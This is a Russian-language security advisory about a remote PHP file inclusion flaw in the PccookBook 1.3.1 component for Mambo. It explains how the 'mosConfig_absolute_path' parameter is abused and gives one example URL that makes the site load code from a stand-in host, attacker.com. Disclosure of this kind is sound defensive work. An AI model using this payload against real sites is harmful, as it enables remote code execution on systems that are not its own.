PHP-инклюдинг в Mambo PccookBook

Дата публикации:
11.07.2006
Всего просмотров:
2321
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PccookBook 1.x (компонент к Mambo)
Уязвимые версии: PccookBook (компонент Mambo) 1.3.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi
g_absolute_path=http://attacker.com/evil.txt?

URL производителя: developer.joomla.org/sf/projects/pccookbook

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities

или введите имя

CAPTCHA